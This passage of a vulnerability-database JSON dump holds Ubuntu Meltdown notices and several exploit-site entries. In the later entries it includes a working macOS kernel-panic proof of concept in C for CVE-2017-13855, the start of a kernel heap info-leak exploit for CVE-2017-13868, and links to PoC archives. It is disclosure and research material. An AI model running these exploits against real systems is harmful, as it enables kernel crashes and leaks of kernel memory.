"authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5754"], "modified": "2018-01-10T00:00:00", "id": "USN-3522-3", "href": "https://ubuntu.com/security/notices/USN-3522-3", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-01-26T13:11:31", "description": "## Releases\n\n * Ubuntu 14.04 ESM\n\n## Packages\n\n * linux-lts-xenial \\- Linux hardware enablement kernel from Xenial for Trusty\n\nUSN-3522-2 fixed a vulnerability in the Linux Hardware Enablement \nkernel for Ubuntu 14.04 LTS to address Meltdown (CVE-2017-5754). \nUnfortunately, that update introduced a regression where a few systems \nfailed to boot successfully. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\nJann Horn discovered that microprocessors utilizing speculative execution \nand indirect branch prediction may allow unauthorized memory reads via \nsidechannel attacks. This flaw is known as Meltdown. A local attacker could \nuse this to expose sensitive information, including kernel memory.\n", "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.6, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2018-01-10T00:00:00", "type": "ubuntu", "title": "Linux kernel (Xenial HWE) regression", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5754"], "modified": "2018-01-10T00:00:00", "id": "USN-3522-4", "href": "https://ubuntu.com/security/notices/USN-3522-4", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-01-26T13:11:39", "description": "## Releases\n\n * Ubuntu 16.04 ESM\n\n## Packages\n\n * linux \\- Linux kernel\n * linux-aws \\- Linux kernel for Amazon Web Services (AWS) systems\n * linux-euclid \\- Linux kernel for Intel Euclid systems\n * linux-kvm \\- Linux kernel for cloud environments\n\nJann Horn discovered that microprocessors utilizing speculative execution \nand indirect branch prediction may allow unauthorized memory reads via \nsidechannel attacks. This flaw is known as Meltdown. A local attacker could \nuse this to expose sensitive information, including kernel memory.\n", "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.6, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2018-01-09T00:00:00", "type": "ubuntu", "title": "Linux kernel vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5754"], "modified": "2018-01-09T00:00:00", "id": "USN-3522-1", "href": "https://ubuntu.com/security/notices/USN-3522-1", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-01-26T13:11:39", "description": "## Releases\n\n * Ubuntu 14.04 ESM\n\n## Packages\n\n * linux \\- Linux kernel\n\nJann Horn discovered that microprocessors utilizing speculative execution \nand indirect branch prediction may allow unauthorized memory reads via \nsidechannel attacks. This flaw is known as Meltdown. A local attacker could \nuse this to expose sensitive information, including kernel memory.\n", "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.6, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2018-01-09T00:00:00", "type": "ubuntu", "title": "Linux kernel vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5754"], "modified": "2018-01-09T00:00:00", "id": "USN-3524-1", "href": "https://ubuntu.com/security/notices/USN-3524-1", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-01-26T13:11:34", "description": "## Releases\n\n * Ubuntu 12.04 \n\n## Packages\n\n * linux \\- Linux kernel\n\nJann Horn discovered that microprocessors utilizing speculative execution \nand indirect branch prediction may allow unauthorized memory reads via \nsidechannel attacks. This flaw is known as Meltdown. A local attacker could \nuse this to expose sensitive information, including kernel memory.\n", "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.6, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2018-01-10T00:00:00", "type": "ubuntu", "title": "Linux kernel vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5754"], "modified": "2018-01-10T00:00:00", "id": "USN-3525-1", "href": "https://ubuntu.com/security/notices/USN-3525-1", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-01-26T13:11:36", "description": "## Releases\n\n * Ubuntu 12.04 \n\n## Packages\n\n * linux-lts-trusty \\- Linux hardware enablement kernel from Trusty for Precise ESM\n\nUSN-3524-1 fixed vulnerabilities in the Linux kernel for Ubuntu 14.04 \nLTS. This update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 14.04 LTS for Ubuntu \n12.04 ESM.\n\nJann Horn discovered that microprocessors utilizing speculative execution \nand indirect branch prediction may allow unauthorized memory reads via \nsidechannel attacks. This flaw is known as Meltdown. A local attacker could \nuse this to expose sensitive information, including kernel memory.\n", "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.6, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2018-01-10T00:00:00", "type": "ubuntu", "title": "Linux kernel (Trusty HWE) vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5754"], "modified": "2018-01-10T00:00:00", "id": "USN-3524-2", "href": "https://ubuntu.com/security/notices/USN-3524-2", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}], "zdt": [{"lastseen": "2018-04-14T17:48:24", "description": "WebKitGTK+ versions 2.18.x suffer from various memory corruption, user interface spoofing, and code execution vulnerabilities.", "cvss3": {}, "published": "2018-01-26T00:00:00", "type": "zdt", "title": "WebKitGTK+ Memory Corruption / Spoofing / Code Execution Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-7161", "CVE-2017-7165", "CVE-2017-7153", "CVE-2017-7160", "CVE-2017-13884", "CVE-2018-4088", "CVE-2018-4096", "CVE-2018-4089", "CVE-2017-13885"], "modified": "2018-01-26T00:00:00", "id": "1337DAY-ID-29634", "href": "https://0day.today/exploit/description/29634", "sourceData": "WebKitGTK+ Memory Corruption / Spoofing / Code Execution Vulnerabilities\r\n\r\nAdvisory URL : https://webkitgtk.org/security/WSA-2018-0002.html\r\nCVE identifiers : CVE-2018-4088, CVE-2018-4089, CVE-2018-4096,\r\n CVE-2017-7153, CVE-2017-7160, CVE-2017-7161,\r\n CVE-2017-7165, CVE-2017-13884, CVE-2017-13885.\r\n\r\nSeveral vulnerabilities were discovered in WebKitGTK+.\r\n\r\nCVE-2018-4088\r\n Versions affected: WebKitGTK+ before 2.18.6.\r\n Credit to Jeonghoon Shin of Theori.\r\n Impact: Processing maliciously crafted web content may lead to\r\n arbitrary code execution. Description: Multiple memory corruption\r\n issues were addressed with improved memory handling.\r\n\r\nCVE-2018-4089\r\n Versions affected: WebKitGTK+ before 2.18.4.\r\n Credit to Ivan Fratric of Google Project Zero.\r\n Impact: Processing maliciously crafted web content may lead to\r\n arbitrary code execution. Description: Multiple memory corruption\r\n issues were addressed with improved memory handling.\r\n\r\nCVE-2018-4096\r\n Versions affected: WebKitGTK+ before 2.18.6.\r\n Credit to OSS-Fuzz.\r\n Impact: Processing maliciously crafted web content may lead to\r\n arbitrary code execution. Description: Multiple memory corruption\r\n issues were addressed with improved memory handling.\r\n\r\nCVE-2017-7153\r\n Versions affected: WebKitGTK+ before 2.18.6.\r\n Credit to Jerry Decime.\r\n Impact: Visiting a malicious website may lead to user interface\r\n spoofing. Description: Redirect responses to 401 Unauthorized may\r\n allow a malicious website to incorrectly display the lock icon on\r\n mixed content. This issue was addressed through improved URL display\r\n logic.\r\n\r\nCVE-2017-7160\r\n Versions affected: WebKitGTK+ before 2.18.6.\r\n Credit to Richard Zhu (fluorescence) working with Trend Micro's Zero\r\n Day Initiative.\r\n Impact: Processing maliciously crafted web content may lead to\r\n arbitrary code execution. Description: Multiple memory corruption\r\n issues were addressed with improved memory handling.\r\n\r\nCVE-2017-7161\r\n Versions affected: WebKitGTK+ before 2.18.6.\r\n Credit to Mitin Svyat.\r\n Impact: Processing maliciously crafted web content may lead to\r\n arbitrary code execution. Description: A command injection issue\r\n existed in Web Inspector. This issue was addressed through improved\r\n escaping of special characters.\r\n\r\nCVE-2017-7165\r\n Versions affected: WebKitGTK+ before 2.18.6.\r\n Credit to 360 Security working with Trend Micro's Zero Day\r\n Initiative.\r\n Impact: Processing maliciously crafted web content may lead to\r\n arbitrary code execution. Description: Multiple memory corruption\r\n issues were addressed with improved memory handling.\r\n\r\nCVE-2017-13884\r\n Versions affected: WebKitGTK+ before 2.18.6.\r\n Credit to 360 Security working with Trend Micro's Zero Day\r\n Initiative.\r\n Impact: Processing maliciously crafted web content may lead to\r\n arbitrary code execution. Description: Multiple memory corruption\r\n issues were addressed with improved memory handling.\r\n\r\nCVE-2017-13885\r\n Versions affected: WebKitGTK+ before 2.18.6.\r\n Credit to 360 Security working with Trend Micro's Zero Day\r\n Initiative.\r\n Impact: Processing maliciously crafted web content may lead to\r\n arbitrary code execution. Description: Multiple memory corruption\r\n issues were addressed with improved memory handling.\r\n\r\n\r\nWe recommend updating to the last stable version of WebKitGTK+. It is\r\nthe best way of ensuring that you are running a safe version of\r\nWebKitGTK+. Please check our website for information about the last\r\nstable releases.\r\n\r\nFurther information about WebKitGTK+ Security Advisories can be found\r\nat: https://webkitgtk.org/security.html\r\n\r\nThe WebKitGTK+ team,\r\nJanuary 24, 2018\n\n# 0day.today [2018-04-14] #", "sourceHref": "https://0day.today/exploit/29634", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-02-09T09:08:05", "description": "Exploit for macOS platform in category dos / poc", "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "zdt", "title": "Apple XNU Kernel - Memory Corruption due to Integer Overflow in __offsetof Usage in posix_spawn on 3", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-13876"], "modified": "2017-12-12T00:00:00", "id": "1337DAY-ID-29202", "href": "https://0day.today/exploit/description/29202", "sourceData": "is a pointer to a further arguments descriptor in userspace with the following structure (on 32-bit): \r\n \r\n struct user32__posix_spawn_args_desc { \r\n uint32_t attr_size; /* size of attributes block */ \r\n uint32_t attrp; /* pointer to block */ \r\n uint32_t file_actions_size; /* size of file actions block */ \r\n uint32_t file_actions; /* pointer to block */ \r\n uint32_t port_actions_size; /* size of port actions block */ \r\n uint32_t port_actions; /* pointer to block */ \r\n uint32_t mac_extensions_size; \r\n uint32_t mac_extensions; \r\n uint32_t coal_info_size; \r\n uint32_t coal_info; \r\n uint32_t persona_info_size; \r\n uint32_t persona_info; \r\n } \r\n \r\n port_actions then points to another structure in userspace of this type: \r\n \r\n struct _posix_spawn_port_actions { \r\n int pspa_alloc; \r\n int pspa_count; \r\n _ps_port_action_t pspa_actions[]; \r\n } \r\n \r\n and finally _ps_port_action_t looks like this: \r\n \r\n struct _ps_port_action { \r\n pspa_t port_type; \r\n exception_mask_t mask; \r\n mach_port_name_t new_port; \r\n exception_behavior_t behavior; \r\n thread_state_flavor_t flavor; \r\n int which; \r\n } \r\n \r\n Note that pspa_actions is a zero-sized array. pspa_count is supposed to be the number of entries \r\n in this array. \r\n \r\n The following constraints are checked in posix_spawn in kern_exec.c: \r\n \r\n if (px_args.port_actions_size != 0) { \r\n /* Limit port_actions to one page of data */ \r\n if (px_args.port_actions_size < PS_PORT_ACTIONS_SIZE(1) || \r\n px_args.port_actions_size > PAGE_SIZE) { \r\n error = EINVAL; \r\n goto bad; \r\n \r\n \r\n PS_PORT_ACTIONS_SIZE is defined like this: \r\n \r\n #define PS_PORT_ACTIONS_SIZE(x) \\ \r\n __offsetof(struct _posix_spawn_port_actions, pspa_actions[(x)]) \r\n \r\n if port_actions_size passes this then we reach the following code: \r\n \r\n MALLOC(px_spap, _posix_spawn_port_actions_t, \r\n px_args.port_actions_size, M_TEMP, M_WAITOK); \r\n if (px_spap == NULL) { \r\n error = ENOMEM; \r\n goto bad; \r\n } \r\n \r\n imgp->ip_px_spa = px_spap; \r\n \r\n if ((error = copyin(px_args.port_actions, px_spap, \r\n px_args.port_actions_size)) != 0) \r\n goto bad; \r\n \r\n This allocates a kernel heap buffer to hold the port_actions buffer and copies from userspace into it. \r\n \r\n The code then attempts to check whether the pspa_count valid is correct: \r\n \r\n /* Verify that the action count matches the struct size */ \r\n if (PS_PORT_ACTIONS_SIZE(px_spap->pspa_count) != px_args.port_actions_size) { \r\n error = EINVAL; \r\n goto bad; \r\n } \r\n \r\n There is an integer overflow here because offsetof is just simple arithmetic. With a carefully chosen \r\n value for pspa_count we can make it very large but when it's passed to the PS_PORT_ACTIONS_SIZE macro \r\n the result is equal to port_actions_size. Nothing bad has happened yet but we can now get pspa_count \r\n to be much larger than it should be. \r\n \r\n Later on we reach the following code: \r\n \r\n if (px_spap->pspa_count != 0 && is_adaptive) { \r\n portwatch_count = px_spap->pspa_count; \r\n MALLOC(portwatch_ports, ipc_port_t *, (sizeof(ipc_port_t) * portwatch_count), M_TEMP, M_WAITOK | M_ZERO); \r\n } else { \r\n portwatch_ports = NULL; \r\n } \r\n \r\n if ((error = exec_handle_port_actions(imgp, &portwatch_present, portwatch_ports)) != 0) \r\n \r\n We can cause another integer overflow here, sizeof(ipc_port_t) is 4 (on 32-bit) so with a carefully chosen value of pspa_count \r\n we can cause the integer overflow here and earlier too whilst still passing the checks. \r\n \r\n exec_handle_port_actions then uses portwatch ports like this: \r\n \r\n for (i = 0; i < pacts->pspa_count; i++) { \r\n act = &pacts->pspa_actions[i]; \r\n \r\n if (MACH_PORT_VALID(act->new_port)) { \r\n kr = ipc_object_copyin(get_task_ipcspace(current_task()), \r\n act->new_port, MACH_MSG_TYPE_COPY_SEND, \r\n (ipc_object_t *) &port); \r\n ... \r\n switch (act->port_type) { \r\n ... \r\n case PSPA_IMP_WATCHPORTS: \r\n if (portwatch_ports != NULL && IPC_PORT_VALID(port)) { \r\n *portwatch_present = TRUE; \r\n /* hold on to this till end of spawn */ \r\n portwatch_ports[i] = port; \r\n \r\n \r\n note that pspa_actions was allocated earlier also based on the result of an integer overflow. \r\n This means we can cause an OOB write to portwatch_ports only if we can successfully read suitable valid \r\n values OOB of pspa_actions. That's why this PoC first fills a kalloc.1024 buffer with suitable values before \r\n freeing it and then hoping that it will get reallocated as pspa_actions (but less thatn 1024 bytes will be written) \r\n such that we control what's read OOB and the ipc_object_copyin will succeed. \r\n \r\n This seems to be pretty reliable. You can use this to build a nice primitive of a heap overflow with pointers \r\n to ipc_port structures. \r\n \r\n I don't believe there are any iOS 11 32-bit iPod/iPhone/iPad/AppleTV devices but the new Apple Watch Series 3 \r\n is running essentially the same kernel but has a 32-bit CPU. This PoC is provided as an Apple watch app \r\n and has been tested on Apple Watch Series 3 (Watch3,2) running WatchOS 4.0.1. I also tested on an older 32-bit iOS 9 device. \r\n \r\n Apple Watch Series 3 now has its own LTE modem and can be used without an iPhone making it a suitably interesting target for exploitation \r\n by itself. \r\n \r\n Note that all the uses of offsetof in those posix_spawn macros are quite wrong, I think you might be able to get \r\n a kernel memory disclosure with one of them also on 64-bit platforms. The fix is to add correct bounds checking. \r\n \r\n Please also note that this really shouldn't be attack surface reachable from an app sandbox. The MAC hook in posix_spawn \r\n is very late and there's a *lot* of code which you can hit before it. \r\n \r\n \r\n Proof of Concept: \r\n https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43325.zip\n\n# 0day.today [2018-02-09] #", "sourceHref": "https://0day.today/exploit/29202", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-02-16T09:17:58", "description": "Exploit for macOS platform in category dos / poc", "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "zdt", "title": "macOS necp_get_socket_attributes so_pcb Type Confusion Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-13855"], "modified": "2017-12-12T00:00:00", "id": "1337DAY-ID-29198", "href": "https://0day.today/exploit/description/29198", "sourceData": "MacOS so_pcb type confusion in necp_get_socket_attributes \r\n\r\nCVE-2017-13855\r\n\r\n\r\nWhen setsockopt() is called on any socket with level SOL_SOCKET and optname SO_NECP_ATTRIBUTES, necp_get_socket_attributes is invoked.\r\nnecp_get_socket_attributes() unconditionally calls sotoinpcb(so):\r\n\r\n errno_t\r\n necp_get_socket_attributes(struct socket *so, struct sockopt *sopt)\r\n {\r\n int error = 0;\r\n u_int8_t *buffer = NULL;\r\n u_int8_t *cursor = NULL;\r\n size_t valsize = 0;\r\n struct inpcb *inp = sotoinpcb(so);\r\n\r\n if (inp->inp_necp_attributes.inp_domain != NULL) {\r\n valsize += sizeof(struct necp_tlv_header) + strlen(inp->inp_necp_attributes.inp_domain);\r\n }\r\n [...]\r\n }\r\n\r\nsotoinpcb() causes type confusion if so->so_pcb is of an unexpected type (because the socket is not an IPv4/IPv6 socket):\r\n\r\n #define sotoinpcb(so) ((struct inpcb *)(so)->so_pcb)\r\n\r\nIf necp_get_socket_attributes() is called on a UNIX domain socket, this will cause the members of inp->inp_necp_attributes to be read from type-confused, probably also out-of-bounds memory behind the actual so->so_pcb (which is of type `struct unpcb`, which looks much smaller than `struct inpcb`).\r\n\r\n\r\nTo trigger this bug, compile the following code, run it, and cause some system activity, e.g. by launching the browser (the PoC won't crash if so->so_pcb contains NULLs in the right spots).\r\n\r\n==============\r\n#include <sys/types.h>\r\n#include <sys/un.h>\r\n#include <sys/socket.h>\r\n#include <err.h>\r\n#include <unistd.h>\r\n\r\n#define SO_NECP_ATTRIBUTES 0x1109\r\n\r\nint main(void) {\r\n while (1) {\r\n int s = socket(AF_UNIX, SOCK_STREAM, 0);\r\n if (s == -1)\r\n err(1, \"socket\");\r\n getsockopt(s, SOL_SOCKET, SO_NECP_ATTRIBUTES, NULL, NULL);\r\n close(s);\r\n }\r\n}\r\n==============\r\n\r\nOn macOS 10.13 (17A405), this causes the following crash:\r\n\r\n==============\r\n*** Panic Report ***\r\npanic(cpu 2 caller 0xffffff800e78a611): Kernel trap at 0xffffff800e976930, type 14=page fault, registers:\r\nCR0: 0x000000008001003b, CR2: 0x000000fa000000cc, CR3: 0x0000000200037073, CR4: 0x00000000001627e0\r\nRAX: 0x000000fa000000cc, RBX: 0x000000fa000000cb, RCX: 0xffffff800eb90aad, RDX: 0xffffff800eb90dcc\r\nRSP: 0xffffff8018de3e70, RBP: 0xffffff8018de3e90, RSI: 0xffffff8018de3ef0, RDI: 0xffffff8032ac66a8\r\n<a href=\"https://crrev.com/8\" title=\"\" class=\"\" rel=\"nofollow\">R8</a>: 0x0000000000000001, <a href=\"https://crrev.com/9\" title=\"\" class=\"\" rel=\"nofollow\">R9</a>: 0xffffffff00000000, <a href=\"https://crrev.com/10\" title=\"\" class=\"\" rel=\"nofollow\">R10</a>: 0x0000000000000000, <a href=\"https://crrev.com/11\" title=\"\" class=\"\" rel=\"nofollow\">R11</a>: 0x0000000000000246\r\n<a href=\"https://crrev.com/12\" title=\"\" class=\"\" rel=\"nofollow\">R12</a>: 0xffffff80357cf7d0, <a href=\"https://crrev.com/13\" title=\"\" class=\"\" rel=\"nofollow\">R13</a>: 0xffffff8032d69a08, <a href=\"https://crrev.com/14\" title=\"\" class=\"\" rel=\"nofollow\">R14</a>: 0xffffff8018de3ef0, <a href=\"https://crrev.com/15\" title=\"\" class=\"\" rel=\"nofollow\">R15</a>: 0xffffff8032ac66a8\r\nRFL: 0x0000000000010206, RIP: 0xffffff800e976930, CS: 0x0000000000000008, SS: 0x0000000000000010\r\nFault CR2: 0x000000fa000000cc, Error code: 0x0000000000000000, Fault CPU: 0x2, PL: 0, VF: 1\r\n==============\r\n\r\nThis bug should be usable for disclosing kernel memory.\r\n\r\nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse\r\nor a patch has been made broadly available, the bug report will become\r\nvisible to the public.\r\n\r\n\r\n\r\nFound by: jannh\n\n# 0day.today [2018-02-16] #", "sourceHref": "https://0day.today/exploit/29198", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-03-06T22:08:06", "description": "Exploit for macOS platform in category local exploits", "cvss3": {}, "published": "2018-03-03T00:00:00", "type": "zdt", "title": "Apple macOS HighSierra 10.13 - ctl_ctloutput-leak Information Leak Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-13868"], "modified": "2018-03-03T00:00:00", "id": "1337DAY-ID-29935", "href": "https://0day.today/exploit/description/29935", "sourceData": "/*\r\n * ctl_ctloutput-leak.c\r\n * Brandon Azad\r\n *\r\n * CVE-2017-13868\r\n *\r\n * While looking through the source code of XNU version 4570.1.46, I noticed that the function\r\n * ctl_ctloutput() in the file bsd/kern/kern_control.c does not check the return value of\r\n * sooptcopyin(), which makes it possible to leak the uninitialized contents of a kernel heap\r\n * allocation to user space. Triggering this information leak requires root privileges.\r\n *\r\n * The ctl_ctloutput() function is called when a userspace program calls getsockopt(2) on a kernel\r\n * control socket. The relevant code does the following:\r\n * (a) It allocates a kernel heap buffer for the data parameter to getsockopt(), without\r\n * specifying the M_ZERO flag to zero out the allocated bytes.\r\n * (b) It copies in the getsockopt() data from userspace using sooptcopyin(), filling the data\r\n * buffer just allocated. This copyin is supposed to completely overwrite the allocated data,\r\n * which is why the M_ZERO flag was not needed. However, the return value of sooptcopyin() is\r\n * not checked, which means it is possible that the copyin has failed, leaving uninitialized\r\n * data in the buffer. The copyin could fail if, for example, the program passed an unmapped\r\n * address to getsockopt().\r\n * (c) The code then calls the real getsockopt() implementation for this kernel control socket.\r\n * This implementation should process the input buffer, possibly modifying it and shortening\r\n * it, and return a result code. However, the implementation is free to assume that the\r\n * supplied buffer has already been initialized (since theoretically it comes from user\r\n * space), and hence several implementations don't modify the buffer at all. The NECP\r\n * function necp_ctl_getopt(), for example, just returns 0 without processing the data buffer\r\n * at all.\r\n * (d) Finally, if the real getsockopt() implementation doesn't return an error, ctl_ctloutput()\r\n * calls sooptcopyout() to copy the data buffer back to user space.\r\n *\r\n * Thus, by specifying an unmapped data address to getsockopt(2), we can cause a heap buffer of a\r\n * controlled size to be allocated, prevent the contents of that buffer from being initialized, and\r\n * then reach a call to sooptcopyout() that tries to write that buffer back to the unmapped\r\n * address. All we need to do for the copyout to succeed is remap that address between the calls to\r\n * sooptcopyin() and sooptcopyout(). If we can do that, then we will leak uninitialized kernel heap\r\n * data to userspace.\r\n *\r\n * It turns out that this is a pretty easy race to win. While testing on my 2015 Macbook Pro, the\r\n * mean number of attempts to win the race was never more than 600, and the median was never more\r\n * than 5. (This testing was conducted with DEBUG off, since the printfs dramatically slow down the\r\n * exploit.)\r\n *\r\n * This program exploits this vulnerability to leak data from a kernel heap buffer of a\r\n * user-specified size. No attempt is made to seed the heap with interesting data. Tested on macOS\r\n * High Sierra 10.13 (build 17A365).\r\n *\r\n * Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44234.zip\r\n *\r\n */\r\n#if 0\r\n if (sopt->sopt_valsize && sopt->sopt_val) {\r\n MALLOC(data, void *, sopt->sopt_valsize, M_TEMP, // (a) data is allocated\r\n M_WAITOK); // without M_ZERO.\r\n if (data == NULL)\r\n return (ENOMEM);\r\n /*\r\n * 4108337 - copy user data in case the\r\n * kernel control needs it\r\n */\r\n error = sooptcopyin(sopt, data, // (b) sooptcopyin() is\r\n sopt->sopt_valsize, sopt->sopt_valsize); // called to fill the\r\n } // buffer; the return\r\n len = sopt->sopt_valsize; // value is ignored.\r\n socket_unlock(so, 0);\r\n error = (*kctl->getopt)(kctl->kctlref, kcb->unit, // (c) The getsockopt()\r\n kcb->userdata, sopt->sopt_name, // implementation is\r\n data, &len); // called to process\r\n if (data != NULL && len > sopt->sopt_valsize) // the buffer.\r\n panic_plain(\"ctl_ctloutput: ctl %s returned \"\r\n \"len (%lu) > sopt_valsize (%lu)\\n\",\r\n kcb->kctl->name, len,\r\n sopt->sopt_valsize);\r\n socket_lock(so, 0);\r\n if (error == 0) {\r\n if (data != NULL)\r\n error = sooptcopyout(sopt, data, len); // (d) If (c) succeeded,\r\n else // then the data buffer\r\n sopt->sopt_valsize = len; // is copied out to\r\n } // userspace.\r\n#endif\r\n \r\n#include <errno.h>\r\n#include <mach/mach.h>\r\n#include <netinet/in.h>\r\n#include <pthread.h>\r\n#include <stdbool.h>\r\n#include <stdint.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <sys/ioctl.h>\r\n#include <unistd.h>\r\n \r\n#if __x86_64__\r\n \r\n// ---- Header files not available on iOS ---------------------------------------------------------\r\n \r\n#include <mach/mach_vm.h>\r\n#include <sys/sys_domain.h>\r\n#include <sys/kern_control.h>\r\n \r\n#else /* __x86_64__ */\r\n \r\n// If we're not on x86_64, then we probably don't have access to the above headers. The following\r\n// definitions are copied directly from the macOS header files.\r\n \r\n// ---- Definitions from mach/mach_vm.h -----------------------------------------------------------\r\n \r\nextern\r\nkern_return_t mach_vm_allocate\r\n(\r\n vm_map_t target,\r\n mach_vm_address_t *address,\r\n mach_vm_size_t size,\r\n int flags\r\n);\r\n \r\nextern\r\nkern_return_t mach_vm_deallocate\r\n(\r\n vm_map_t target,\r\n mach_vm_address_t address,\r\n mach_vm_size_t size\r\n);\r\n \r\n// ---- Definitions from sys/sys_domain.h ---------------------------------------------------------\r\n \r\n#define SYSPROTO_CONTROL 2 